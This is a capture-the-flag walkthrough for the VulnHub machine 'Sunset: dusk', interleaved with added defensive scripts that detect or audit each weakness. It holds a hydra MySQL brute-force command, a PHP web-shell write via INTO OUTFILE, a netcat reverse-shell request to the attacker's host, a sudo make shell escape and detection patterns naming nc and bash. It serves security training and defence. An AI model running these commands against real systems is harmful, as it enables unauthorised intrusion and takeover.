Sunset: dusk is another CTF challenge from VulnHub. The difficulty level is set for beginners, and credit goes to whitecr0wz. It is a boot-to-root challenge in which you have to hunt two flags. Download it from here.
Penetration Testing Methodologies
Network scanning
· Nmap
· Netdiscover
Enumeration
· Weak credentials
· PHP file injection
Exploiting RCE
Privilege Escalation
· Sudo rights
· Docker
Walkthrough
Network Scanning
First of all, we try to
identify our target. We did this using the netdiscover command.
Now that we have identified our target using the above
command, we can continue to our next step i.e. scanning the host IP to identify
open ports and running services. We will use Nmap to scan the target with the
following command:
nmap -A 192.168.1.167
As a result, we found multiple open ports with services running on them, so we need to enumerate further.
Enumeration
We started the enumeration with FTP and HTTP and looked for anything suspicious, but unfortunately found no useful clue, so we tried a MySQL brute-force attack with hydra using the rockyou.txt wordlist.
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.167 mysql
We found the MySQL login credentials: the username is root and the password is password, which is a weak credential.
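The brute-force step above is noisy: every wrong guess leaves an "Access denied for user ... (using password: YES)" line in the MySQL error log. The following detector is an added example (not from the original post) that parses lines in that shape and flags any user/source pair with a burst of failures inside a sliding window; the log lines and the threshold are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the style of a MySQL error log (not from the
# original post). "Access denied for user ... (using password: YES)" is the
# text MySQL emits for a failed password login.
SAMPLE_LOG = """\
2020-01-10T12:00:00.000001Z 31 [Note] Access denied for user 'root'@'192.168.1.107' (using password: YES)
2020-01-10T12:00:00.200001Z 32 [Note] Access denied for user 'root'@'192.168.1.107' (using password: YES)
2020-01-10T12:00:00.400001Z 33 [Note] Access denied for user 'root'@'192.168.1.107' (using password: YES)
2020-01-10T12:00:00.600001Z 34 [Note] Access denied for user 'root'@'192.168.1.107' (using password: YES)
2020-01-10T12:00:00.800001Z 35 [Note] Access denied for user 'root'@'192.168.1.107' (using password: YES)
2020-01-10T12:00:01.000001Z 36 [Note] Access denied for user 'root'@'192.168.1.107' (using password: YES)
2020-01-10T12:05:00.000001Z 40 [Note] Access denied for user 'app'@'10.0.0.5' (using password: YES)
2020-01-10T13:00:00.000001Z 50 [Note] Access denied for user 'root'@'192.168.1.107' (using password: YES)
"""

DENIED_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+\[\w+\]\s+Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def parse_denied(lines):
    """Yield (timestamp, user, host) for each failed-login line."""
    for line in lines:
        m = DENIED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%fZ")
        yield ts, m.group("user"), m.group("host")


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {(user, host): count} for every user/source pair that produced
    at least `threshold` failed logins inside one sliding window."""
    events = defaultdict(list)
    for ts, user, host in parse_denied(lines):
        events[(user, host)].append(ts)

    alerts = {}
    for key, stamps in events.items():
        stamps.sort()
        start = 0
        best = 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it fits inside `window`.
            while ts - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[key] = best
    return alerts


if __name__ == "__main__":
    for (user, host), count in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"brute force suspected: {user}@{host} ({count} failures in window)")
```

In the constructed sample, six failures for root from 192.168.1.107 land within one second and trip the alert, while the single failure for app and the isolated root failure an hour later do not. Turning on `log_error_verbosity` high enough to record these lines, and pairing the alert with a rate limit such as `max_connect_errors`, makes a run like the hydra one above both visible and slow.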
We also navigated to port 8080, where the page displays a directory listing of its current directory; here the author has left a hint about the writable directory /var/tmp. These loopholes make it easy for us to deface the machine.
Since we have the MySQL credentials and know that the working directory is /var/tmp, we can write malicious PHP code into a file named "raj.php" by way of an SQL query. This gives us RCE, and by exploiting it we will be able to spawn a shell on the host machine.
select "" into outfile '/var/tmp/raj.php';
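Writing a file through `INTO OUTFILE` needs three things to line up: an account with the FILE privilege, a server that accepts that account from the attacker's host, and an empty `secure_file_priv` so the write is not confined to one directory. The following audit script is an added example (not from the original post) that checks a my.cnf fragment and SHOW GRANTS-style output for exactly those conditions; both the weak and the hardened configuration and the grant lines are constructed for the example.

```python
import configparser
import re

# Constructed my.cnf fragments (not from the original post). The weak one
# leaves secure_file_priv empty, so INTO OUTFILE can write anywhere the
# mysqld process can; the hardened one confines it to one directory.
WEAK_CNF = """\
[mysqld]
bind-address = 0.0.0.0
secure_file_priv =
"""

HARDENED_CNF = """\
[mysqld]
bind-address = 127.0.0.1
secure_file_priv = /var/lib/mysql-files
"""

# Constructed lines in the shape of SHOW GRANTS output, one statement each.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION",
    "GRANT SELECT, FILE ON *.* TO 'reporting'@'10.0.0.%'",
    "GRANT SELECT, INSERT ON app.* TO 'app'@'localhost'",
]

GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def audit_config(cnf_text):
    """Flag mysqld settings that make file writes and remote logins easy."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.read_string(cnf_text)
    findings = []
    sfp = cp.get("mysqld", "secure_file_priv", fallback=None)
    if sfp is None or sfp.strip() == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE can write anywhere mysqld can")
    bind = cp.get("mysqld", "bind-address", fallback="0.0.0.0")
    if bind.strip() in ("0.0.0.0", "::", "*"):
        findings.append("bind-address exposes mysqld on all interfaces")
    return findings


def audit_grants(grant_lines):
    """Flag accounts that can write files or log in from any host."""
    findings = []
    for line in grant_lines:
        m = GRANT_RE.match(line)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        user, host, scope = m.group("user"), m.group("host"), m.group("scope")
        account = f"{user}@{host}"
        if host == "%":
            findings.append(f"{account}: reachable from any host")
        # FILE is a global privilege, so it only matters on *.*
        if ("FILE" in privs or "ALL PRIVILEGES" in privs) and scope == "*.*":
            findings.append(f"{account}: has FILE (can use INTO OUTFILE)")
    return findings


if __name__ == "__main__":
    for f in audit_config(WEAK_CNF) + audit_grants(SAMPLE_GRANTS):
        print("finding:", f)
```

On the constructed input the weak configuration produces two findings and the hardened one none, and the root and reporting accounts are flagged for FILE. Keeping `secure_file_priv` pointed at a directory the web server does not serve removes the path the walkthrough takes even when the credentials are guessed.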
So, again we navigated to port 8080 and saw the entry for the raj.php file.
It was time to execute raj.php and verify the RCE parameter by requesting the following URL:
http://192.168.1.167:8080/raj.php?cmd=id
Thus, we found that we are able to run system commands through this page.
Exploiting
It was time to exploit the RCE, so we used a netcat reverse shell to spawn a shell on the host machine.
http://192.168.1.167:8080/raj.php?cmd=nc -e /bin/bash 192.168.1.107 1234
Bravo!! We hit the goal, spawned a shell on the host machine, and found the 1st flag, user.txt, in /home/dusk.
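Both the `cmd=id` check and the netcat reverse shell request above pass through the web server's access log as ordinary GET requests, which is where a defender would catch them. The detector below is an added example (not from the original post): it parses combined-format access log lines, URL-decodes each query parameter, and flags requests whose parameter name is a typical web-shell command parameter or whose value carries shell syntax. The log lines, parameter list and shell-syntax patterns are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format access log lines (not from the original post).
# Lines 2 and 3 mirror the two requests made in the walkthrough; line 4 is a
# benign request that mentions netcat only as a search term.
SAMPLE_ACCESS_LOG = """\
192.168.1.107 - - [10/Jan/2020:12:10:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.107 - - [10/Jan/2020:12:10:05 +0000] "GET /raj.php?cmd=id HTTP/1.1" 200 61 "-" "Mozilla/5.0"
192.168.1.107 - - [10/Jan/2020:12:10:09 +0000] "GET /raj.php?cmd=nc%20-e%20/bin/bash%20192.168.1.107%201234 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2020:12:11:00 +0000] "GET /search.php?q=netcat+tutorial HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Parameter names commonly used by one-line web shells (constructed list).
SUSPICIOUS_PARAMS = {"cmd", "exec", "command", "c", "shell", "run"}

# Shell syntax that has no business inside an ordinary query parameter.
SHELL_HINTS = re.compile(r"(/bin/|\bnc\b|\bbash\b|\bsh\b|;|\|\||&&|\$\(|`)")


def score_request(target):
    """Return the reasons a request target looks like web-shell traffic."""
    reasons = []
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in SUSPICIOUS_PARAMS:
            reasons.append(f"parameter '{name}' is a common web-shell command parameter")
        if SHELL_HINTS.search(value):
            reasons.append(f"parameter '{name}' carries shell syntax: {value!r}")
    return reasons


def find_webshell_requests(lines):
    """Return (source, target, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = score_request(m.group("target"))
        if reasons:
            hits.append((m.group("src"), m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for src, target, reasons in find_webshell_requests(SAMPLE_ACCESS_LOG.splitlines()):
        print(f"{src} {target}")
        for r in reasons:
            print("   -", r)
```

On the constructed log the `cmd=id` request is flagged by parameter name alone, the reverse-shell request is flagged on both name and content, and the search for "netcat tutorial" is left alone because `parse_qsl` decodes it to plain words with no shell tokens. A second, cheaper control on this box is simply not serving /var/tmp over HTTP: a PHP file that cannot be reached by the web server cannot become a shell.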
Privilege Escalation
Next we moved on to privilege escalation. We checked the sudo rights for www-data and noticed that the user www-data holds sudo rights for the "make" and "sl" programs; here we escalate to a shell as user dusk by exploiting the make program.
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
After executing the above command, we were able to access the host shell as user dusk, who is also a member of the docker group.
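The two weaknesses used in this section, a sudo rule for a program that can run arbitrary commands and membership of the docker group, are both things a host audit can list before an attacker does. The script below is an added example (not from the original post): it parses `sudo -l` style output and an /etc/group fragment, flags sudo targets that can hand the caller a shell (make among them) or need no password, and lists docker group members, since access to the Docker socket is equivalent to root. The sudo output, the group file and the list of shell-capable binaries are constructed for the example.

```python
import os
import re

# Constructed output in the shape of `sudo -l` for www-data (not from the
# original post; hostname and paths are placeholders).
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on host:
    (dusk) NOPASSWD: /usr/bin/make, /usr/games/sl
"""

# Constructed /etc/group fragment.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
docker:x:999:dusk
www-data:x:33:
"""

# Programs that can run arbitrary commands or spawn an interactive shell when
# invoked through sudo. make is the one used on this box; the rest are
# well-known build tools, interpreters, editors and pagers with the same
# property (constructed list, extend to taste).
SHELL_CAPABLE = {
    "make", "sh", "bash", "python", "python3", "perl", "vi", "vim",
    "less", "more", "find", "awk", "env",
}

SUDO_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_rules(text):
    """Return [{'runas', 'tags', 'cmd'}] from the command section of sudo -l."""
    rules = []
    in_cmds = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        if not in_cmds:
            continue
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m.group("runas"), "tags": tags, "cmd": cmd})
    return rules


def audit_sudo_rules(rules):
    """Flag rules whose target can escape to a shell or needs no password."""
    findings = []
    for r in rules:
        base = os.path.basename(r["cmd"].split()[0])
        if r["cmd"] == "ALL" or base in SHELL_CAPABLE:
            findings.append(f"{r['cmd']} as ({r['runas']}): can spawn a shell or run arbitrary commands")
        if "NOPASSWD" in r["tags"]:
            findings.append(f"{r['cmd']} as ({r['runas']}): NOPASSWD, no authentication needed")
    return findings


def docker_group_members(group_text):
    """Return the users listed in the docker group (root-equivalent access)."""
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 4 and parts[0] == "docker":
            return [m for m in parts[3].split(",") if m]
    return []


if __name__ == "__main__":
    for f in audit_sudo_rules(parse_sudo_rules(SAMPLE_SUDO_L)):
        print("sudo:", f)
    print("docker group:", docker_group_members(SAMPLE_GROUP))
```

On the constructed input the make rule is flagged twice (shell-capable and NOPASSWD), the sl rule only for NOPASSWD, and dusk is reported as a docker group member. The fix is the usual one: grant sudo only for programs that cannot be coaxed into running something else, require a password, and treat docker group membership as root.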